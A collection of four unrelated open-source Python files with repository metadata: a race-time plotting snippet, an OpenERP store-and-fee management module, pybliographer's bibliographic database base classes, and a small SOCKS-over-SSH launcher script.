meyrin = np.asarray(meyrin)
semi = np.asarray(semi)
fig = plt.figure()
ax = fig.add_subplot(111)
ax.grid(True)
ax.hexbin(meyrin, semi, cmap=plt.cm.PuBu)
ax.xaxis.set_major_formatter(matplotlib.ticker.FuncFormatter(nice_time))
ax.set_xlabel("Foulees automnales de Meyrin 10k")
ax.yaxis.set_major_formatter(matplotlib.ticker.FuncFormatter(nice_time))
ax.set_ylabel("Geneva half marathon")
plt.show()
fig.savefig("/tmp/meyrin-vs-geneva.png")
|
betatim/toys
|
run-times.py
|
Python
|
gpl-2.0
| 4,019
|
# -*- coding: utf-8 -*-
import datetime
import time
import utildate
from openerp.osv import fields, osv
from openerp.tools.translate import _
class Store(osv.osv):
_name = "tms.store"
def name_get(self,cr,uid,ids,context=None):
res=[]
display_widget=None
if context:
display_widget = context.get("display_widget",None)
for r in self.read(cr,uid,ids,['name','storenum']):
if display_widget =="dropdownlist":
res.append((r['id'],'(%s)%s'%(r['storenum'],r['name'])))
else:
res.append((r['id'],r['name']))
return res
def name_search(self,cr,uid,name="",args=None,operator="ilike",context=None,limit=100):
if not args:
args=[]
if not context:
context={}
ids=[]
if name:
ids = self.search(cr, uid, [('storenum',operator,name)]+ args, limit=limit, context=context)
if not ids:
ids = self.search(cr, uid, [('name',operator,name)]+ args, limit=limit, context=context)
return self.name_get(cr, uid, ids, context=context)
_columns = {
"name":fields.char(string="Store Name", required=True, size=200),
"storenum":fields.char(string="Store num", required=True, size=100),
"province_id":fields.many2one("res.country.state", string="Province",store=True,required=True,domain=[('country_id','=',49)]),
"address":fields.char(string="Address", size=200),
"contactperson":fields.char(string="Contact Person", size=100),
"telephone":fields.char(string="Telephone", size=50),
"mobile":fields.char(string="Mobile", size=50),
"netusername":fields.char(string="Net User Name", size=60),
"netuserpass":fields.char(string="Net User pwd", size=60),
"dynamicdomain":fields.char(string="Dynamic Domain", size=200),
"dynamicdomainpass":fields.char(string="Dynamic Domain pass", size=100),
"dynamicdomainaddress":fields.char(string="Dynamic Domain Address", size=100),
"dynamicdomainotheraddress":fields.char(string="Domain Other Address", size=100),
"peanutuserpass":fields.char(string="Peanut User pass", size=100),
"peanutdomain":fields.char(string="花生壳域名",size=100),
"peanutdomainaddress":fields.char(string="花生壳域名地址",size=100),
"peanutvalidemail":fields.char(string="Peanut valid email", size=100),
"peanutemailpass":fields.char(string="Peanut email pass", size=100),
"poscdk":fields.char(string="POSCDK", size=200),
"remark":fields.text(string="Remark")
}
_sql_constraints = [('storenum_uniq', 'unique(storenum)', 'Storenum must be unique!')]
Store()
class ApplyInfo(osv.osv):
_name="tms.applyinfo"
def get_province_name(self,cr,uid,ids,name,args,context=None):
result=dict.fromkeys(ids,'None')
for item in self.browse(cr,uid,ids,context=context):
result[item.id] = item.store_id.province_id.name
return result
def get_province_by_store_id(self,cr,uid,store_id,context=None):
if not store_id:
return False
pitem = self.pool.get("tms.store").browse(cr,uid,store_id,context=context)
if not pitem:
return False
return pitem.province_id.name
def on_change_store(self,cr,uid,ids,model_id,context=None):
if not model_id:
return False
item = self.pool.get("tms.store").browse(cr,uid,model_id,context=context)
if not item :
return False
return {
"value":{
"province":self.get_province_by_store_id(cr,uid,item.id),
"storenum":item.storenum,
"telephone":item.telephone,
"mobile":item.mobile,
"address":item.address,
"contactperson":item.contactperson
}
}
def _get_default_processid(self,cr,uid,code,context):
sequenceid=self.pool.get("ir.sequence").search(cr,uid,[('code','=',code)])
sequence = self.pool.get("ir.sequence").browse(cr,uid,sequenceid,context=None)
return sequence[0].get_id()
def create(self,cr,uid,data,context=None):
apply_id = super(ApplyInfo, self).create(cr, uid, data, context=context)
print "apply_id=%s"%apply_id
#print context
childtypename = type(self).__name__
print childtypename
processid = self._get_default_processid(cr,uid,"tms.applyinfo.processid",context)
state = "unreceived"
if childtypename=="tms.stopandmoveapplyinfo":
print "stop and move"
processid = self._get_default_processid(cr,uid,"tms.stopmoveapplyinfo.processid",context)
state = "hasconfirm"
print "create state is %s"% state
self.write(cr,uid,apply_id,{"state":state,"processid":processid},context)
#self.write(cr,uid,apply_id,{"state":"hasconfirm"},context)
return apply_id
def name_get(self,cr,uid,ids,context=None):
res = []
for item in self.browse(cr,uid,ids,context):
res.append((item.id,item.processid))
return res
"""def write(self,cr,uid,ids,values,context=None):
print "call write method,parammeter values are %s" % values
childtypename = type(self).__name__
if childtypename =="tms.stopandmoveapplyinfo":
return super(ApplyInfo,self).write(cr,uid,ids,values,context)
if self.user_has_groups(cr,uid,"tms.group_tms_applyinfo_factory",context):
applyinfo_state = set([item.state for item in self.browse(cr,uid,ids,context)])
current_state = applyinfo_state.pop()
if len(applyinfo_state)==0 and( current_state=="unreceived" or current_state=='draft'):
return super(ApplyInfo,self).write(cr,uid,ids,values,context)
else:
raise osv.except_osv(_("Operation Canceld"),u"你只能修改未接收申报!")
return super(ApplyInfo,self).write(cr,uid,ids,values,context)
"""
def unlink(self,cr,uid,ids,context=None):
childtypename = type(self).__name__
if childtypename!='tms.stopandmoveapplyinfo' and self.user_has_groups(cr,uid,"tms.group_tms_applyinfo_factory",context):
applyinfo_state = set([item.state for item in self.browse(cr,uid,ids,context)])
if len(applyinfo_state)>1 or applyinfo_state.pop()!="unreceived":
raise osv.except_osv(_("Operation Canceld"),u"你只能删除未接收申报!")
return super(ApplyInfo,self).unlink(cr,uid,ids,context)
_columns = {
"user_id":fields.many2one("res.users",string="Add Man"),
"processid":fields.char(string="ProcessId",size=100,required=False),
"store_id":fields.many2one("tms.store",string="Sotre",required=True),
"province":fields.function(get_province_name,type="char",string="Province",store=True),
"storenum":fields.related("store_id","storenum",type="char",string="Store Num"),
"telephone":fields.related("store_id","telephone",type="char",string="telephone"),
"mobile":fields.related("store_id","mobile",type="char",string="mobile"),
"address":fields.related("store_id","address",type="char",string="Address"),
"contactperson":fields.related("store_id","contactperson",type="char",string="Contact Person"),
"content":fields.text(string="Content",required=True),
"applyinfoitem_ids":fields.one2many("tms.applyinfoitem","applyinfo_id",string="ApplyInfo Items"),
"create_time":fields.date(string="Create Time"),
"state":fields.selection([("draft","Draft"),("unreceived","UnReceived"),("hasreceived","HasReceived"),
("hasdone","HasDone"),("hasconfirm","HasConfirm")],string="State",required=True,readonly=True),
}
def applyinfo_unreceived(self,cr,uid,ids,args=None,context=None):
self.write(cr,uid,ids,{'state':'unreceived'})
return True
def applyinfo_hasreceived(self,cr,uid,ids,args=None,context=None):
self.write(cr,uid,ids,{'state':'hasreceived'})
return True
def applyinfo_hasdone(self,cr,uid,ids,args=None,context=None):
self.write(cr,uid,ids,{'state':'hasdone'})
return True
def applyinfo_hasconfirm(self,cr,uid,ids,args=None,context=None):
self.write(cr,uid,ids,{'state':'hasconfirm'})
return True
_order = "processid desc"
_defaults={
#"processid":_get_default_processid,
"user_id":lambda self,cr,uid,context:uid,
"create_time":lambda self,cr,uid,context:datetime.datetime.now().strftime("%Y-%m-%d"),
"state":lambda self,cr,uid,context:"draft",
}
ApplyInfo()
class ApplyInfoItem(osv.osv):
_name="tms.applyinfoitem"
_order="create_time asc"
_columns={
"name":fields.text(string="Remark"),
"user_id":fields.many2one("res.users",string="Add Man"),
"create_time":fields.datetime(string="Add time"),
"applyinfo_id":fields.many2one("tms.applyinfo",string="ApplyInfo"),
}
_defaults={
"user_id":lambda self,cr,uid,context:uid,
"create_time":lambda self,cr,uid,context:datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
}
ApplyInfoItem()
class StopAndMoveApplyInfo(osv.osv):
_name="tms.stopandmoveapplyinfo"
_inherit="tms.applyinfo"
_columns={
"applyinfotype":fields.selection([("move","Move"),("offnet","Off Net"),("powercut","Power Cut"),
("govermentcheck","Goverment Check"),("duetoeletricity","Due to electricity"),
("duetonet","Due to net"),("duetohouse","Due to House"),("other","Other")
],string="ApplyInfo Type",required=True),
"create_time":fields.datetime(string="Create Time"),
"content":fields.text(string="Content",required=False),
}
_defaults={
"user_id":lambda self,cr,uid,context:uid,
"state":lambda self,cr,uid,context:"hasconfirm",
"create_time":lambda self,cr,uid,context:time.strftime('%Y-%m-%d %H:%M:%S',time.localtime()),
}
StopAndMoveApplyInfo()
class FeeType(osv.osv):
"""
费用类别
"""
_name = "tms.feetype"
_columns={
"name":fields.char(string="Name", size=100,required=True),
"code":fields.char(string="Code",size=100,required=True),
"remark":fields.char(string="Remark",size=300,required=False)
}
_sql_constraints = [('name_uniq', 'unique(name)', 'FeeType name must be unique!'),
('code_uniq','unique(code)','FeeType code must be unique!')
]
FeeType()
class SendCompany(osv.osv):
"""
快递公司
"""
_name="tms.sendcompany"
_columns={
"name":fields.char(string="Company Name",size=100,required=True),
"remark":fields.char(string="Remark",size=300)
}
_sql_constraints = [('name_uniq', 'unique(name)', 'SendCompany name must be unique!')]
SendCompany()
class FeeBase(osv.osv):
"""
费用基本类型,作为维护费用来使用
"""
_name="tms.feebase"
def get_province_name(self,cr,uid,ids,name,args,context=None):
print "get_province_name ,ids is %s "% ids
result=dict.fromkeys(ids,'None')
print self.browse(cr,uid,ids,context= context )
for item in self.browse(cr,uid,ids,context=context):
result[item.id] = item.store_id.province_id.name
#print item.productname
#result[item.id] = ''
return result
def _get_default_processid(self,cr,uid,code,context):
sequenceid=self.pool.get("ir.sequence").search(cr,uid,[('code','=',code)])
sequence = self.pool.get("ir.sequence").browse(cr,uid,sequenceid,context=None)
return sequence[0].get_id()
def on_change_store(self,cr,uid,ids,model_id,context=None):
if not model_id:
return False
item = self.pool.get("tms.store").browse(cr,uid,model_id,context=context)
if not item :
return False
return {
"value":{
"province":self.get_province_by_store_id(cr,uid,item.id),
"storenum":item.storenum,
}
}
def get_province_by_store_id(self,cr,uid,store_id,context=None):
if not store_id:
return False
pitem = self.pool.get("tms.store").browse(cr,uid,store_id,context=context)
if not pitem:
return False
return pitem.province_id.name
def name_get(self,cr,uid,ids,context=None):
res = []
for item in self.browse(cr,uid,ids,context):
res.append((item.id,item.processid))
return res
def _get_accountperiod_list(self,cr,uid,context=None):
"""
暂时不使用,账期由入账时间直接生成
"""
res=[]
for index in range(-6,6):
item = utildate.getyearandmonth(index)
period = ("%s%s"%(item[0],item[1]))
res.append((period,period))
return res
def name_get(self,cr,uid,ids,context=None):
res = []
for item in self.browse(cr,uid,ids,context):
res.append((item.id,item.processid))
return res
def create(self,cr,uid,data,context=None):
print "create productforit ,data is %s" % data
if type(data['store_id']) is list:
data["store_id"] = data["store_id"][0]
feebase_id = super(FeeBase, self).create(cr, uid, data, context=context)
childtypename = type(self).__name__
processid = ""
if childtypename=="FeeBase":
processid = self._get_default_processid(cr,uid,'tms.feebase.processid',context)
elif childtypename =="tms.feeforsend":
processid = self._get_default_processid(cr,uid,'tms.feeforsend.processid',context)
elif childtypename=="tms.feeforproduct":
processid = self._get_default_processid(cr,uid,'tms.feeforproduct.processid',context)
elif childtypename=="tms.feeforproductit":
processid = self._get_default_processid(cr,uid,'tms.feeforproductit.processid',context)
elif childtypename=="tms.feeforitservice":
processid = self._get_default_processid(cr,uid,'tms.feeforitservice.processid',context)
elif childtypename=="tms.feeforother":
processid = self._get_default_processid(cr,uid,'tms.feeforother.processid',context)
self.write(cr,uid,feebase_id,{"accountperiod":data['feedate'][0:7].replace('-',''),"processid":processid},context)
return feebase_id
def export_data(self,cr,uid,ids,fields_to_export,context=None):
print fields_to_export
print "User have tms.group_tms_fee_finance %s" % self.user_has_groups(cr,uid,"tms.group_tms_fee_finance",context)
if not self.user_has_groups(cr,uid,"tms.group_tms_fee_finance",context):
if "amount" in fields_to_export:
fields_to_export.remove("amount")
if "productprice" in fields_to_export:
fields_to_export.remove("productprice")
if "productcount" in fields_to_export:
fields_to_export.remove("productcount")
return super(FeeBase,self).export_data(cr,uid,ids,fields_to_export,context)
def write(self,cr,uid,ids,values,context=None):
print "call write method,parammeter value is %s" % values
if not self.user_has_groups(cr,uid,"tms.group_tms_fee_finance",context):
if len(values)!=2 and sorted(values.keys())!=sorted(['oanum','state']):
raise osv.except_osv(_("Operation Canceld"),u"您没有修改的权限!")
return super(FeeBase,self).write(cr,uid,ids,values,context)
def _check_fee_state(self,cr,uid,ids,oldstate,targetstate,context=None):
model_id = context["active_model"]
model=self.pool.get(model_id)
items = model.browse(cr,uid,ids,context=context)
if targetstate!='hasback' and any([item.state!=oldstate for item in items]):
raise osv.except_osv(_('Operation Canceld'),_('Only '+oldstate+' fee can be exported!'))
for item in items:
model.write(cr,uid,item.id,{"state":targetstate})
return True
def _check_is_finance(self,cr,uid):
uitem=self.pool.get("res.users").browse(cr,uid,uid)
groupnames = [item.name for item in uitem.groups_id]
print groupnames
if "Finance Fee Manager" not in groupnames:
raise osv.except_osv(_('Operation Canceld'),_('You are not Finance Fee Manager!'))
def export_to_account(self,cr,uid,ids,context=None):
self._check_is_finance(cr,uid)
return self._check_fee_state(cr,uid,ids,'draft','hasexported',context=context)
def set_to_hasback(self,cr,uid,ids,context=None):
self._check_is_finance(cr,uid)
return self._check_fee_state(cr,uid,ids,'hasoa','hasback',context=context)
_columns={
"processid":fields.char(string="ProcessId",size=100,required=False),
"applyprocessid":fields.char(string="ApplyInfo Num",size=100,required=False),
"feedate":fields.date(string="Fee Date"),
"store_id":fields.many2one("tms.store",string="Store"),
"storenum":fields.related("store_id","storenum",type="char",string="Store Num"),
"province":fields.function(get_province_name,type="char",string="Province",store=True),
"feetype_id":fields.many2one("tms.feetype","Fee Type"),
"payman":fields.many2one("res.users","Pay Man"),
"amount":fields.float(string="Amount"),
"accountamount":fields.float(string="Account Amount"),
"accountperiod":fields.char(string="Account Period", size=20,required=False),
"oanum":fields.char(string="OA Num",size=100),
"feecontent":fields.char(string="Fee Content",size=100),
"remark":fields.text(string="Remark"),
"state":fields.selection([("draft","Draft"),("hasexported","Has Exported"),("hasoa","Has Input OANum"),("hasback","Has Back")],
string="States"),
}
_order = "processid desc"
_defaults={
"feedate":lambda self,cr,uid,context:datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
"payman":lambda self,cr,uid,context:uid,
"state":lambda self,cr,uid,context:'draft',
"feecontent":lambda self,cr,uid,context:'上门服务费',
}
FeeBase()
class FeeForSend(osv.osv):
_inherit="tms.feebase"
_name = "tms.feeforsend"
_columns={
"sendcompany":fields.many2one("tms.sendcompany","Send Company"),
"sendordernum":fields.char(string="Send Order num",size=100,required=True),
"sendproduct":fields.char(string="Send Product", size=200,required=True),
}
FeeForSend()
class FeeForProduct(osv.osv):
_inherit="tms.feebase"
_name = "tms.feeforproduct"
def on_change_productaccount(self,cr,uid,ids,productcount,productprice,context=None):
return {
"value":{
"amount":productcount*productprice,
"accountproductprice":productprice,
"accountproductcount":productcount,
"accountamount":productcount*productprice,
}
}
def on_change_accountproductaccount(self,cr,uid,ids,accountproductcount,accountproductprice,context=None):
return {
"value":{
"accountamount":accountproductprice*accountproductcount,
}
}
_columns={
"productname":fields.char(string="Product Name",size=200),
"producttype":fields.char(string="Product Type",size=100),
"productprice":fields.float(string="Product Price"),
"productcount":fields.integer(string="Product Count"),
"accountproductprice":fields.integer(string="Account Product Price"),
"accountproductcount":fields.integer(string="Account Product Count")
}
FeeForProduct()
class FeeForProductIt(osv.osv):
_inherit="tms.feebase"
_name = "tms.feeforproductit"
def on_change_productaccount(self,cr,uid,ids,productcount,productprice,context=None):
return {
"value":{
"amount":productcount*productprice,
"accountproductprice":productprice,
"accountproductcount":productcount,
"accountamount":productcount*productprice,
}
}
def on_change_accountproductaccount(self,cr,uid,ids,accountproductcount,accountproductprice,context=None):
return {
"value":{
"accountamount":accountproductprice*accountproductcount,
}
}
_columns={
"productname":fields.char(string="Product Name",size=200),
"producttype":fields.char(string="Product Type",size=200),
"productprice":fields.float(string="Product Price",groups="tms.group_tms_fee_finance"),
"productcount":fields.integer(string="Product Count",groups="tms.group_tms_fee_finance"),
"accountproductprice":fields.integer(string="Account Product Price",groups="tms.group_tms_fee_accout,tms.group_tms_fee_finance"),
"accountproductcount":fields.integer(string="Account Product Count",groups="tms.group_tms_fee_accout,tms.group_tms_fee_finance")
}
FeeForProductIt()
class FeeForItService(osv.osv):
_inherit="tms.feebase"
_name = "tms.feeforitservice"
FeeForItService()
class FeeForOther(osv.osv):
_inherit="tms.feebase"
_name = "tms.feeforother"
FeeForOther()
|
3dfxsoftware/cbss-addons
|
tms/tms.py
|
Python
|
gpl-2.0
| 21,758
|
# This file is part of pybliographer
#
# Copyright (C) 1998-2004 Frederic GOBRY
# Email : gobry@pybliographer.org
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
#
''' This Module contains the base classes one might want to inherit
from in order to provide a new database format '''
from string import *
import re, copy, os
import Legacy.Help
from types import *
from Legacy import Autoload, Config, Iterator, Key, Open, Selection, Utils
from shutil import copyfile
class Entry:
'''
A database entry. It behaves like a dictionnary, which
returns an instance of Description for each key. For example,
entry [\'author\'] is expected to return a Types.AuthorGroup
instance.
Each entry class must define an unique ID, which is used
during conversions.
The entry.key is an instance of Key, and has to be unique over
the whole application.
The entry.type is an instance of Types.EntryDescription. It
links the field names with their type.
'''
id = 'VirtualEntry'
def __init__ (self, key = None, type = None, dict = None):
self.type = type
self.dict = dict or {}
self.key = key
return
def keys (self):
''' returns all the keys for this entry '''
return self.dict.keys()
def has_key (self, key):
if self.dict.has_key(key):
return True
return False
def field_and_loss (self, key):
''' return field with indication of convertion loss '''
return self.dict[key], 0
def __getitem__ (self, key):
''' return text representation of a field '''
return self.field_and_loss(key)[0]
def get(self, key, default=None):
if self.has_key(key):
return self[key]
else:
return default
def __setitem__(self, name, value):
self.dict[name] = value
return
def __delitem__(self, name):
del self.dict[name]
return
def __add__(self, other):
''' Merges two entries, key by key '''
ret = Entry (self.key, self.type, {})
# Prendre ses propres entrees
for f in self.keys():
ret[f] = self[f]
# et ajouter celles qu'on n'a pas
for f in other.keys():
if not self.has_key(f):
ret[f] = other[f]
return ret
def __repr__(self):
''' Internal representation '''
return 'Entry (%s, %s, %s)' % (`self.key`, `self.type`, `self.dict`)
def __str__(self):
''' Nice standard entry '''
tp = self.type.name
fields = self.type.fields
try:
text = '%s [%s]\n' % (tp, self.key.key)
except AttributeError:
text = '%s [no key]\n' %(tp)
text = text + ('-' * 70) + '\n'
dico = self.keys ()
for f in fields:
name = f.name
lcname = lower(name)
if not self.has_key(lcname):
continue
text = text + ' %-14s ' % name
text = text + Utils.format(str(self[lcname]),
75, 17, 17) [17:]
text = text + '\n'
try:
dico.remove(lcname)
except ValueError:
raise ValueError, \
'multiple definitions of field `%s\' in `%s\'' \
% (name, tp)
for f in dico:
text = text + ' %-14s ' % f
text = text + Utils.format(str(self[f]),
75, 17, 17) [17:]
text = text + '\n'
return text
class DataBase:
'''This class represents a full bibliographic database. It
also looks like a dictionnary, each key being an instance of
class Key.
'''
properties = {}
filemeta = {}
id ='VirtualDB'
def __init__(self, url):
''' Open the database referenced by the URL '''
self.key = url
self.dict = {}
self.file_metadata = {}
return
def has_property(self, prop):
'''Indicates if the database has a given property.'''
if self.properties.has_key (prop):
return self.properties [prop]
return True
def generate_key(self, entry):
# call a key generator
keytype = Config.get('base/keyformat').data
return Autoload.get_by_name('key', keytype).data(entry, self)
def add(self, entry):
'''Adds an (eventually) anonymous entry.'''
if entry.key is None:
entry.key = self.generate_key(entry)
else:
entry.key.base = self.key
if self.has_key(entry.key):
prefix = entry.key.key
suffix = ord ('a')
while True:
key = Key.Key(self, prefix + '-' + chr(suffix))
if not self.has_key (key):
break
suffix += 1
entry.key = key
self[entry.key] = entry
return entry
def new_entry(self, type):
'''Creates a new entry of the native type of the database '''
return Entry(None, type)
def keys(self):
'''Returns a list of all the keys available for the database '''
return self.dict.keys()
def has_key(self, key):
'''Tests for a given key '''
return self.dict.has_key(key)
def would_have_key(self, key):
'''Test for a key that would be set on the database '''
return self.has_key(Key.Key(self, key.key))
def __getitem__(self, key):
'''Returns the Entry object associated with the key '''
return self.dict [key]
def __setitem__ (self, key, value):
'''Sets a key Entry '''
key.base = self.key
value.key = key
self.dict[key] = value
return
def __delitem__(self, key):
'''Removes an Entry from the database, by its key '''
del self.dict[key]
return
def __len__(self):
'''Number of entries in the database '''
return len(self.keys())
def __str__(self):
'''Database representation '''
return '<generic bibliographic database (' + `len(self)` + \
' entries)>'
def __repr__(self):
'''Database representation '''
return 'DataBase (%s)' % `self.key`
def iterator(self):
''' Returns an iterator for that database '''
return Iterator.DBIterator(self)
def update(self, sorting=None):
''' Updates the Entries stored in the database '''
if self.key.url [0] != 'file':
raise IOError, "can't update the remote database `%s'" % self.key
name = self.key.url[2]
if Config.get('base/directsave').data:
if Config.get('base/backup').data:
copyfile(name, name + '.bak')
namefile = open(name, 'w')
iterator = Selection.Selection(sort=sorting).iterator(self.iterator())
Open.bibwrite(iterator, out=namefile, how=self.id, database=self)
namefile.close ()
else:
# create a temporary file for the new version
tmp = os.path.join(os.path.dirname(name),
'.#' + os.path.basename(name))
tmpfile = open(tmp, 'w')
iterator = Selection.Selection(sort=sorting).iterator(self.iterator())
Open.bibwrite(iterator, out=tmpfile, how=self.id, database=self)
tmpfile.close()
# if we succeeded, and backup is set, backup file
if Config.get('base/backup').data:
os.rename(name, name + '.bak')
# ...and bring new version online
os.rename(tmp, name)
return
def get_metadata(self, key, default=None):
return self.file_metadata.get(key, default)
def set_metadata(self, key, value):
self.file_metadata[key] = value
|
zkota/pyblio-1.3
|
Legacy/Base.py
|
Python
|
gpl-2.0
| 7,923
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
#Author:left_left
import socks_ssh
server = '127.0.0.1'
port = 10000
user = 'root'
password = 'password'
bind_addr = '0.0.0.0'
bind_port = 1080
t_num = 10
socks_ssh.run(server, port, user, password, bind_addr, bind_port, t_num)
|
zuopucuen/ssh_socks
|
pysocks/run_socks_ssh.py
|
Python
|
gpl-2.0
| 284
|